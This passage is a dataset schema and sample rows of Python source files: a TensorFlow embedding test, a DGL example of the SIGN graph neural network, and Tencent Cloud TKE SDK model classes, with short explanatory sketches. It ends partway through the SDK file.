Dataset schema (column name, type, and observed length range or number of distinct values):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40–40 |
| directory_id | string | length 40–40 |
| path | string | length 3–616 |
| content_id | string | length 40–40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40–40 |
| revision_id | string | length 40–40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M (contains nulls) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 (contains nulls) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 (contains nulls) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | list | length 1–1 |
| author_id | string | length 1–132 |
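For readers who want to work with rows like the ones shown below, here is a minimal sketch of loading and filtering such a dataset with the Hugging Face `datasets` library. The dataset identifier `org/python-source-files` is a placeholder (the real repository id is not given here); only column names from the schema above are used.

```python
# Minimal sketch: stream rows from a hypothetical Hub copy of this dataset
# and keep only permissively licensed files.
from datasets import load_dataset

# "org/python-source-files" is a placeholder id, not the actual dataset name.
ds = load_dataset("org/python-source-files", split="train", streaming=True)

for row in ds.take(5):
    if row["license_type"] == "permissive":
        print(row["repo_name"], row["path"], row["length_bytes"])
```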
830a140f3af9cb75dd17cf22df4d0529f9709007 | 8f1673c2abfed8f372e22fbd1c280486014b4466 | /nmt/embeddings/fresh_embedding_test.py | 02c77c2260cfcd5f01d846f377761ea8db571074 | [
"Apache-2.0"
] | permissive | naivenlp/naivenmt-legacy | be670df40a98c0f28bdacb2a3acf9a5b06667966 | bcceeec0a477eb09c4a8915e638a27dae6c95562 | refs/heads/master | 2021-10-27T02:55:33.160837 | 2019-04-15T14:39:06 | 2019-04-15T14:39:06 | 118,464,831 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py |
import tensorflow as tf
import numpy as np
from nmt.embeddings.fresh_embedding import FreshEmbedding
from nmt import misc_utils
class FreshEmbeddingTest(tf.test.TestCase):
def testFreshEmbedding(self):
vocab_file = misc_utils.get_test_data('iwslt15.vocab.100.en')
embedder = FreshEmbedding(vocab_file=vocab_file)
inputs = np.array([
['I', 'am', 'a', 'test']
])
inputs = tf.constant(inputs,dtype=tf.string)
length = np.array([4])
length = tf.constant(length,dtype=tf.int32)
params = {
'batch_size': 1
}
embedded = embedder.embedding(inputs, length, params)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.tables_initializer())
embedded = sess.run(embedded)
print(embedded)
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
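The test above exercises `FreshEmbedding`, which maps string tokens to rows of a freshly initialized embedding matrix via a vocabulary file. Since the naivenmt implementation itself is not shown here, the following is only a conceptual sketch in plain NumPy of the token → id → vector lookup that the test relies on; the vocabulary contents and embedding size are made up for illustration.

```python
# Conceptual sketch (not the naivenmt implementation): token -> id -> embedding row.
import numpy as np

vocab = ["<unk>", "I", "am", "a", "test"]            # stand-in for iwslt15.vocab.100.en
token_to_id = {tok: i for i, tok in enumerate(vocab)}

embed_dim = 8
rng = np.random.default_rng(0)
embedding_matrix = rng.normal(size=(len(vocab), embed_dim))   # "fresh", randomly initialized

tokens = ["I", "am", "a", "test"]
ids = np.array([token_to_id.get(t, 0) for t in tokens])       # unknown tokens map to <unk>
embedded = embedding_matrix[ids]                              # shape: (4, embed_dim)
print(embedded.shape)
```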
f2ea129609ab68de9af623d8b8c473e6eb333988 | 98f1a0bfa5b20a0b81e9e555d76e706c62d949c9 | /examples/sparse/sign.py | 61ba2104d673a953ad976e5b10a35c9c2232d0b9 | [
"Apache-2.0"
] | permissive | dmlc/dgl | 3a8fbca3a7f0e9adf6e69679ad62948df48dfc42 | bbc8ff6261f2e0d2b5982e992b6fbe545e2a4aa1 | refs/heads/master | 2023-08-31T16:33:21.139163 | 2023-08-31T07:49:22 | 2023-08-31T07:49:22 | 130,375,797 | 12,631 | 3,482 | Apache-2.0 | 2023-09-14T15:48:24 | 2018-04-20T14:49:09 | Python | UTF-8 | Python | false | false | 3,804 | py |
"""
[SIGN: Scalable Inception Graph Neural Networks]
(https://arxiv.org/abs/2004.11198)
This example shows a simplified version of SIGN: a precomputed 2-hop diffusion
operator on top of the symmetrically normalized adjacency matrix A_hat.
"""
import dgl.sparse as dglsp
import torch
import torch.nn as nn
import torch.nn.functional as F
from dgl.data import CoraGraphDataset
from torch.optim import Adam
################################################################################
# (HIGHLIGHT) Take advantage of the DGL sparse APIs to implement the feature
# diffusion in SIGN concisely.
################################################################################
def sign_diffusion(A, X, r):
# Perform the r-hop diffusion operation.
X_sign = [X]
for _ in range(r):
X = A @ X
X_sign.append(X)
return X_sign
class SIGN(nn.Module):
def __init__(self, in_size, out_size, r, hidden_size=256):
super().__init__()
# Note that theta and omega refer to the learnable matrices in the
# original paper correspondingly. The variable r refers to subscript to
# theta.
self.theta = nn.ModuleList(
[nn.Linear(in_size, hidden_size) for _ in range(r + 1)]
)
self.omega = nn.Linear(hidden_size * (r + 1), out_size)
def forward(self, X_sign):
results = []
for i in range(len(X_sign)):
results.append(self.theta[i](X_sign[i]))
Z = F.relu(torch.cat(results, dim=1))
return self.omega(Z)
def evaluate(g, pred):
label = g.ndata["label"]
val_mask = g.ndata["val_mask"]
test_mask = g.ndata["test_mask"]
# Compute accuracy on validation/test set.
val_acc = (pred[val_mask] == label[val_mask]).float().mean()
test_acc = (pred[test_mask] == label[test_mask]).float().mean()
return val_acc, test_acc
def train(model, g, X_sign):
label = g.ndata["label"]
train_mask = g.ndata["train_mask"]
optimizer = Adam(model.parameters(), lr=3e-3)
for epoch in range(10):
# Switch the model to training mode.
model.train()
# Forward.
logits = model(X_sign)
# Compute loss with nodes in training set.
loss = F.cross_entropy(logits[train_mask], label[train_mask])
# Backward.
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Switch the model to evaluating mode.
model.eval()
# Compute prediction.
logits = model(X_sign)
pred = logits.argmax(1)
# Evaluate the prediction.
val_acc, test_acc = evaluate(g, pred)
print(
f"In epoch {epoch}, loss: {loss:.3f}, val acc: {val_acc:.3f}, test"
f" acc: {test_acc:.3f}"
)
if __name__ == "__main__":
# If CUDA is available, use GPU to accelerate the training, use CPU
# otherwise.
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Load graph from the existing dataset.
dataset = CoraGraphDataset()
g = dataset[0].to(dev)
# Create the sparse adjacency matrix A (note that W was used as the notation
# for adjacency matrix in the original paper).
indices = torch.stack(g.edges())
N = g.num_nodes()
A = dglsp.spmatrix(indices, shape=(N, N))
# Calculate the symmetrically normalized adjacency matrix.
I = dglsp.identity(A.shape, device=dev)
A_hat = A + I
D_hat = dglsp.diag(A_hat.sum(dim=1)) ** -0.5
A_hat = D_hat @ A_hat @ D_hat
# 2-hop diffusion.
r = 2
X = g.ndata["feat"]
X_sign = sign_diffusion(A_hat, X, r)
# Create SIGN model.
in_size = X.shape[1]
out_size = dataset.num_classes
model = SIGN(in_size, out_size, r).to(dev)
# Kick off training.
train(model, g, X_sign)
| [
"[email protected]"
] | |
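To make the precomputation in the example above concrete, here is a small self-contained sketch of the same steps, A_hat = D^-1/2 (A + I) D^-1/2 followed by r rounds of diffusion, written with dense PyTorch tensors instead of the `dgl.sparse` API. The 4-node graph and feature sizes are invented purely for illustration.

```python
# Dense illustration of the SIGN precomputation shown above (toy 4-node graph).
import torch

A = torch.tensor([[0., 1., 0., 0.],
                  [1., 0., 1., 1.],
                  [0., 1., 0., 0.],
                  [0., 1., 0., 0.]])
X = torch.randn(4, 5)                      # 4 nodes, 5 input features

A_hat = A + torch.eye(4)                   # add self-loops
d_inv_sqrt = A_hat.sum(dim=1).pow(-0.5)
D_hat = torch.diag(d_inv_sqrt)
A_hat = D_hat @ A_hat @ D_hat              # symmetric normalization

r = 2
X_sign = [X]
for _ in range(r):                         # r-hop diffusion, precomputed once
    X_sign.append(A_hat @ X_sign[-1])

print([t.shape for t in X_sign])           # three views: X, A_hat X, A_hat^2 X
```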
7476db67d7a9a1e950e4e9ac795f4d9a8fc1af7d | bdf647d2f626578aa447258b7529f4acfdb2cfba | /tencentcloud/tke/v20180525/models.py | 26b20dc4ac138734595287fda29734009f79bad4 | [
"Apache-2.0"
] | permissive | psixdp/tencentcloud-sdk-python | 2c93528b9d7a5cec1fa38c3dd140a277abf8d26e | 7e0ec01ebb50cbfb92c60ed1f29a59b77199ccea | refs/heads/master | 2020-06-30T22:12:23.331433 | 2019-08-02T03:16:09 | 2019-08-02T03:16:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 43,176 | py |
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tencentcloud.common.abstract_model import AbstractModel
class AddExistedInstancesRequest(AbstractModel):
"""AddExistedInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceIds: 实例列表
:type InstanceIds: list of str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param EnhancedService: 增强服务。通过该参数可以指定是否开启云安全、云监控等服务。若不指定该参数,则默认开启云监控、云安全服务。
:type EnhancedService: :class:`tencentcloud.tke.v20180525.models.EnhancedService`
:param LoginSettings: 节点登录信息(目前仅支持使用Password或者单个KeyIds)
:type LoginSettings: :class:`tencentcloud.tke.v20180525.models.LoginSettings`
:param SecurityGroupIds: 实例所属安全组。该参数可以通过调用 DescribeSecurityGroups 的返回值中的sgId字段来获取。若不指定该参数,则绑定默认安全组。(目前仅支持设置单个sgId)
:type SecurityGroupIds: list of str
"""
self.ClusterId = None
self.InstanceIds = None
self.InstanceAdvancedSettings = None
self.EnhancedService = None
self.LoginSettings = None
self.SecurityGroupIds = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("EnhancedService") is not None:
self.EnhancedService = EnhancedService()
self.EnhancedService._deserialize(params.get("EnhancedService"))
if params.get("LoginSettings") is not None:
self.LoginSettings = LoginSettings()
self.LoginSettings._deserialize(params.get("LoginSettings"))
self.SecurityGroupIds = params.get("SecurityGroupIds")
class AddExistedInstancesResponse(AbstractModel):
"""AddExistedInstances返回参数结构体
"""
def __init__(self):
"""
:param FailedInstanceIds: 失败的节点ID
:type FailedInstanceIds: list of str
:param SuccInstanceIds: 成功的节点ID
:type SuccInstanceIds: list of str
:param TimeoutInstanceIds: 超时未返回出来节点的ID(可能失败,也可能成功)
:type TimeoutInstanceIds: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.FailedInstanceIds = None
self.SuccInstanceIds = None
self.TimeoutInstanceIds = None
self.RequestId = None
def _deserialize(self, params):
self.FailedInstanceIds = params.get("FailedInstanceIds")
self.SuccInstanceIds = params.get("SuccInstanceIds")
self.TimeoutInstanceIds = params.get("TimeoutInstanceIds")
self.RequestId = params.get("RequestId")
class Cluster(AbstractModel):
"""集群信息结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param ClusterName: 集群名称
:type ClusterName: str
:param ClusterDescription: 集群描述
:type ClusterDescription: str
:param ClusterVersion: 集群版本(默认值为1.10.5)
:type ClusterVersion: str
:param ClusterOs: 集群系统。centos7.2x86_64 或者 ubuntu16.04.1 LTSx86_64,默认取值为ubuntu16.04.1 LTSx86_64
:type ClusterOs: str
:param ClusterType: 集群类型,托管集群:MANAGED_CLUSTER,独立集群:INDEPENDENT_CLUSTER。
:type ClusterType: str
:param ClusterNetworkSettings: 集群网络相关参数
:type ClusterNetworkSettings: :class:`tencentcloud.tke.v20180525.models.ClusterNetworkSettings`
:param ClusterNodeNum: 集群当前node数量
:type ClusterNodeNum: int
:param ProjectId: 集群所属的项目ID
:type ProjectId: int
"""
self.ClusterId = None
self.ClusterName = None
self.ClusterDescription = None
self.ClusterVersion = None
self.ClusterOs = None
self.ClusterType = None
self.ClusterNetworkSettings = None
self.ClusterNodeNum = None
self.ProjectId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.ClusterName = params.get("ClusterName")
self.ClusterDescription = params.get("ClusterDescription")
self.ClusterVersion = params.get("ClusterVersion")
self.ClusterOs = params.get("ClusterOs")
self.ClusterType = params.get("ClusterType")
if params.get("ClusterNetworkSettings") is not None:
self.ClusterNetworkSettings = ClusterNetworkSettings()
self.ClusterNetworkSettings._deserialize(params.get("ClusterNetworkSettings"))
self.ClusterNodeNum = params.get("ClusterNodeNum")
self.ProjectId = params.get("ProjectId")
class ClusterAdvancedSettings(AbstractModel):
"""集群高级配置
"""
def __init__(self):
"""
:param IPVS: 是否启用IPVS
:type IPVS: bool
:param AsEnabled: 是否启用集群节点扩缩容
:type AsEnabled: bool
:param ContainerRuntime: 集群使用的runtime类型,包括"docker"和"containerd"两种类型,默认为"docker"
:type ContainerRuntime: str
"""
self.IPVS = None
self.AsEnabled = None
self.ContainerRuntime = None
def _deserialize(self, params):
self.IPVS = params.get("IPVS")
self.AsEnabled = params.get("AsEnabled")
self.ContainerRuntime = params.get("ContainerRuntime")
class ClusterBasicSettings(AbstractModel):
"""描述集群的基本配置信息
"""
def __init__(self):
"""
:param ClusterOs: 集群系统。centos7.2x86_64 或者 ubuntu16.04.1 LTSx86_64,默认取值为ubuntu16.04.1 LTSx86_64
:type ClusterOs: str
:param ClusterVersion: 集群版本,默认值为1.10.5
:type ClusterVersion: str
:param ClusterName: 集群名称
:type ClusterName: str
:param ClusterDescription: 集群描述
:type ClusterDescription: str
:param VpcId: 私有网络ID,形如vpc-xxx。创建托管空集群时必传。
:type VpcId: str
:param ProjectId: 集群内新增资源所属项目ID。
:type ProjectId: int
"""
self.ClusterOs = None
self.ClusterVersion = None
self.ClusterName = None
self.ClusterDescription = None
self.VpcId = None
self.ProjectId = None
def _deserialize(self, params):
self.ClusterOs = params.get("ClusterOs")
self.ClusterVersion = params.get("ClusterVersion")
self.ClusterName = params.get("ClusterName")
self.ClusterDescription = params.get("ClusterDescription")
self.VpcId = params.get("VpcId")
self.ProjectId = params.get("ProjectId")
class ClusterCIDRSettings(AbstractModel):
"""集群容器网络相关参数
"""
def __init__(self):
"""
:param ClusterCIDR: 用于分配集群容器和服务 IP 的 CIDR,不得与 VPC CIDR 冲突,也不得与同 VPC 内其他集群 CIDR 冲突
:type ClusterCIDR: str
:param IgnoreClusterCIDRConflict: 是否忽略 ClusterCIDR 冲突错误, 默认不忽略
:type IgnoreClusterCIDRConflict: bool
:param MaxNodePodNum: 集群中每个Node上最大的Pod数量
:type MaxNodePodNum: int
:param MaxClusterServiceNum: 集群最大的service数量
:type MaxClusterServiceNum: int
"""
self.ClusterCIDR = None
self.IgnoreClusterCIDRConflict = None
self.MaxNodePodNum = None
self.MaxClusterServiceNum = None
def _deserialize(self, params):
self.ClusterCIDR = params.get("ClusterCIDR")
self.IgnoreClusterCIDRConflict = params.get("IgnoreClusterCIDRConflict")
self.MaxNodePodNum = params.get("MaxNodePodNum")
self.MaxClusterServiceNum = params.get("MaxClusterServiceNum")
class ClusterNetworkSettings(AbstractModel):
"""集群网络相关的参数
"""
def __init__(self):
"""
:param ClusterCIDR: 用于分配集群容器和服务 IP 的 CIDR,不得与 VPC CIDR 冲突,也不得与同 VPC 内其他集群 CIDR 冲突
:type ClusterCIDR: str
:param IgnoreClusterCIDRConflict: 是否忽略 ClusterCIDR 冲突错误, 默认不忽略
:type IgnoreClusterCIDRConflict: bool
:param MaxNodePodNum: 集群中每个Node上最大的Pod数量(默认为256)
:type MaxNodePodNum: int
:param MaxClusterServiceNum: 集群最大的service数量(默认为256)
:type MaxClusterServiceNum: int
:param Ipvs: 是否启用IPVS(默认不开启)
:type Ipvs: bool
:param VpcId: 集群的VPCID(如果创建空集群,为必传值,否则自动设置为和集群的节点保持一致)
:type VpcId: str
:param Cni: 网络插件是否启用CNI(默认开启)
:type Cni: bool
"""
self.ClusterCIDR = None
self.IgnoreClusterCIDRConflict = None
self.MaxNodePodNum = None
self.MaxClusterServiceNum = None
self.Ipvs = None
self.VpcId = None
self.Cni = None
def _deserialize(self, params):
self.ClusterCIDR = params.get("ClusterCIDR")
self.IgnoreClusterCIDRConflict = params.get("IgnoreClusterCIDRConflict")
self.MaxNodePodNum = params.get("MaxNodePodNum")
self.MaxClusterServiceNum = params.get("MaxClusterServiceNum")
self.Ipvs = params.get("Ipvs")
self.VpcId = params.get("VpcId")
self.Cni = params.get("Cni")
class CreateClusterInstancesRequest(AbstractModel):
"""CreateClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写 查询集群列表 接口中返回的 clusterId 字段
:type ClusterId: str
:param RunInstancePara: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口。
:type RunInstancePara: str
:param InstanceAdvancedSettings: 实例额外需要设置参数信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
"""
self.ClusterId = None
self.RunInstancePara = None
self.InstanceAdvancedSettings = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.RunInstancePara = params.get("RunInstancePara")
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
class CreateClusterInstancesResponse(AbstractModel):
"""CreateClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param InstanceIdSet: 节点实例ID
:type InstanceIdSet: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.InstanceIdSet = None
self.RequestId = None
def _deserialize(self, params):
self.InstanceIdSet = params.get("InstanceIdSet")
self.RequestId = params.get("RequestId")
class CreateClusterRequest(AbstractModel):
"""CreateCluster请求参数结构体
"""
def __init__(self):
"""
:param ClusterCIDRSettings: 集群容器网络配置信息
:type ClusterCIDRSettings: :class:`tencentcloud.tke.v20180525.models.ClusterCIDRSettings`
:param ClusterType: 集群类型,托管集群:MANAGED_CLUSTER,独立集群:INDEPENDENT_CLUSTER。
:type ClusterType: str
:param RunInstancesForNode: CVM创建透传参数,json化字符串格式,详见[CVM创建实例](https://cloud.tencent.com/document/product/213/15730)接口。
:type RunInstancesForNode: list of RunInstancesForNode
:param ClusterBasicSettings: 集群的基本配置信息
:type ClusterBasicSettings: :class:`tencentcloud.tke.v20180525.models.ClusterBasicSettings`
:param ClusterAdvancedSettings: 集群高级配置信息
:type ClusterAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.ClusterAdvancedSettings`
:param InstanceAdvancedSettings: 节点高级配置信息
:type InstanceAdvancedSettings: :class:`tencentcloud.tke.v20180525.models.InstanceAdvancedSettings`
:param ExistedInstancesForNode: 已存在实例的配置信息
:type ExistedInstancesForNode: list of ExistedInstancesForNode
"""
self.ClusterCIDRSettings = None
self.ClusterType = None
self.RunInstancesForNode = None
self.ClusterBasicSettings = None
self.ClusterAdvancedSettings = None
self.InstanceAdvancedSettings = None
self.ExistedInstancesForNode = None
def _deserialize(self, params):
if params.get("ClusterCIDRSettings") is not None:
self.ClusterCIDRSettings = ClusterCIDRSettings()
self.ClusterCIDRSettings._deserialize(params.get("ClusterCIDRSettings"))
self.ClusterType = params.get("ClusterType")
if params.get("RunInstancesForNode") is not None:
self.RunInstancesForNode = []
for item in params.get("RunInstancesForNode"):
obj = RunInstancesForNode()
obj._deserialize(item)
self.RunInstancesForNode.append(obj)
if params.get("ClusterBasicSettings") is not None:
self.ClusterBasicSettings = ClusterBasicSettings()
self.ClusterBasicSettings._deserialize(params.get("ClusterBasicSettings"))
if params.get("ClusterAdvancedSettings") is not None:
self.ClusterAdvancedSettings = ClusterAdvancedSettings()
self.ClusterAdvancedSettings._deserialize(params.get("ClusterAdvancedSettings"))
if params.get("InstanceAdvancedSettings") is not None:
self.InstanceAdvancedSettings = InstanceAdvancedSettings()
self.InstanceAdvancedSettings._deserialize(params.get("InstanceAdvancedSettings"))
if params.get("ExistedInstancesForNode") is not None:
self.ExistedInstancesForNode = []
for item in params.get("ExistedInstancesForNode"):
obj = ExistedInstancesForNode()
obj._deserialize(item)
self.ExistedInstancesForNode.append(obj)
class CreateClusterResponse(AbstractModel):
"""CreateCluster返回参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.ClusterId = None
self.RequestId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.RequestId = params.get("RequestId")
class DeleteClusterInstancesRequest(AbstractModel):
"""DeleteClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceIds: 主机InstanceId列表
:type InstanceIds: list of str
:param InstanceDeleteMode: 集群实例删除时的策略:terminate(销毁实例,仅支持按量计费云主机实例) retain (仅移除,保留实例)
:type InstanceDeleteMode: str
"""
self.ClusterId = None
self.InstanceIds = None
self.InstanceDeleteMode = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
self.InstanceDeleteMode = params.get("InstanceDeleteMode")
class DeleteClusterInstancesResponse(AbstractModel):
"""DeleteClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.RequestId = None
def _deserialize(self, params):
self.RequestId = params.get("RequestId")
class DeleteClusterRequest(AbstractModel):
"""DeleteCluster请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param InstanceDeleteMode: 集群实例删除时的策略:terminate(销毁实例,仅支持按量计费云主机实例) retain (仅移除,保留实例)
:type InstanceDeleteMode: str
"""
self.ClusterId = None
self.InstanceDeleteMode = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceDeleteMode = params.get("InstanceDeleteMode")
class DeleteClusterResponse(AbstractModel):
"""DeleteCluster返回参数结构体
"""
def __init__(self):
"""
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.RequestId = None
def _deserialize(self, params):
self.RequestId = params.get("RequestId")
class DescribeClusterInstancesRequest(AbstractModel):
"""DescribeClusterInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群ID
:type ClusterId: str
:param Offset: 偏移量,默认0
:type Offset: int
:param Limit: 最大输出条数,默认20
:type Limit: int
:param InstanceIds: 需要获取的节点实例Id列表(默认为空,表示拉取集群下所有节点实例)
:type InstanceIds: list of str
"""
self.ClusterId = None
self.Offset = None
self.Limit = None
self.InstanceIds = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
self.InstanceIds = params.get("InstanceIds")
class DescribeClusterInstancesResponse(AbstractModel):
"""DescribeClusterInstances返回参数结构体
"""
def __init__(self):
"""
:param TotalCount: 集群中实例总数
:type TotalCount: int
:param InstanceSet: 集群中实例列表
:type InstanceSet: list of Instance
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.TotalCount = None
self.InstanceSet = None
self.RequestId = None
def _deserialize(self, params):
self.TotalCount = params.get("TotalCount")
if params.get("InstanceSet") is not None:
self.InstanceSet = []
for item in params.get("InstanceSet"):
obj = Instance()
obj._deserialize(item)
self.InstanceSet.append(obj)
self.RequestId = params.get("RequestId")
class DescribeClusterSecurityRequest(AbstractModel):
"""DescribeClusterSecurity请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写 查询集群列表 接口中返回的 clusterId 字段
:type ClusterId: str
"""
self.ClusterId = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
class DescribeClusterSecurityResponse(AbstractModel):
"""DescribeClusterSecurity返回参数结构体
"""
def __init__(self):
"""
:param UserName: 集群的账号名称
:type UserName: str
:param Password: 集群的访问密码
:type Password: str
:param CertificationAuthority: 集群访问CA证书
:type CertificationAuthority: str
:param ClusterExternalEndpoint: 集群访问的地址
:type ClusterExternalEndpoint: str
:param Domain: 集群访问的域名
:type Domain: str
:param PgwEndpoint: 集群Endpoint地址
:type PgwEndpoint: str
:param SecurityPolicy: 集群访问策略组
:type SecurityPolicy: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.UserName = None
self.Password = None
self.CertificationAuthority = None
self.ClusterExternalEndpoint = None
self.Domain = None
self.PgwEndpoint = None
self.SecurityPolicy = None
self.RequestId = None
def _deserialize(self, params):
self.UserName = params.get("UserName")
self.Password = params.get("Password")
self.CertificationAuthority = params.get("CertificationAuthority")
self.ClusterExternalEndpoint = params.get("ClusterExternalEndpoint")
self.Domain = params.get("Domain")
self.PgwEndpoint = params.get("PgwEndpoint")
self.SecurityPolicy = params.get("SecurityPolicy")
self.RequestId = params.get("RequestId")
class DescribeClustersRequest(AbstractModel):
"""DescribeClusters请求参数结构体
"""
def __init__(self):
"""
:param ClusterIds: 集群ID列表(为空时,
表示获取账号下所有集群)
:type ClusterIds: list of str
:param Offset: 偏移量,默认0
:type Offset: int
:param Limit: 最大输出条数,默认20
:type Limit: int
:param Filters: 过滤条件,当前只支持按照单个条件ClusterName进行过滤
:type Filters: list of Filter
"""
self.ClusterIds = None
self.Offset = None
self.Limit = None
self.Filters = None
def _deserialize(self, params):
self.ClusterIds = params.get("ClusterIds")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
if params.get("Filters") is not None:
self.Filters = []
for item in params.get("Filters"):
obj = Filter()
obj._deserialize(item)
self.Filters.append(obj)
class DescribeClustersResponse(AbstractModel):
"""DescribeClusters返回参数结构体
"""
def __init__(self):
"""
:param TotalCount: 集群总个数
:type TotalCount: int
:param Clusters: 集群信息列表
:type Clusters: list of Cluster
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.TotalCount = None
self.Clusters = None
self.RequestId = None
def _deserialize(self, params):
self.TotalCount = params.get("TotalCount")
if params.get("Clusters") is not None:
self.Clusters = []
for item in params.get("Clusters"):
obj = Cluster()
obj._deserialize(item)
self.Clusters.append(obj)
self.RequestId = params.get("RequestId")
class DescribeExistedInstancesRequest(AbstractModel):
"""DescribeExistedInstances请求参数结构体
"""
def __init__(self):
"""
:param ClusterId: 集群 ID,请填写查询集群列表 接口中返回的 ClusterId 字段(仅通过ClusterId获取需要过滤条件中的VPCID,比较状态时会使用该地域下所有集群中的节点进行比较。参数不支持同时指定InstanceIds和ClusterId。
:type ClusterId: str
:param InstanceIds: 按照一个或者多个实例ID查询。实例ID形如:ins-xxxxxxxx。(此参数的具体格式可参考API简介的id.N一节)。每次请求的实例的上限为100。参数不支持同时指定InstanceIds和Filters。
:type InstanceIds: list of str
:param Filters: 过滤条件,字段和详见[CVM查询实例](https://cloud.tencent.com/document/api/213/15728)如果设置了ClusterId,会附加集群的VPCID作为查询字段,在此情况下如果在Filter中指定了"vpc-id"作为过滤字段,指定的VPCID必须与集群的VPCID相同。
:type Filters: :class:`tencentcloud.tke.v20180525.models.Filter`
:param VagueIpAddress: 实例IP进行过滤(同时支持内网IP和外网IP)
:type VagueIpAddress: str
:param VagueInstanceName: 实例名称进行过滤
:type VagueInstanceName: str
:param Offset: 偏移量,默认为0。关于Offset的更进一步介绍请参考 API [简介](https://cloud.tencent.com/document/api/213/15688)中的相关小节。
:type Offset: int
:param Limit: 返回数量,默认为20,最大值为100。关于Limit的更进一步介绍请参考 API [简介](https://cloud.tencent.com/document/api/213/15688)中的相关小节。
:type Limit: int
"""
self.ClusterId = None
self.InstanceIds = None
self.Filters = None
self.VagueIpAddress = None
self.VagueInstanceName = None
self.Offset = None
self.Limit = None
def _deserialize(self, params):
self.ClusterId = params.get("ClusterId")
self.InstanceIds = params.get("InstanceIds")
if params.get("Filters") is not None:
self.Filters = Filter()
self.Filters._deserialize(params.get("Filters"))
self.VagueIpAddress = params.get("VagueIpAddress")
self.VagueInstanceName = params.get("VagueInstanceName")
self.Offset = params.get("Offset")
self.Limit = params.get("Limit")
class DescribeExistedInstancesResponse(AbstractModel):
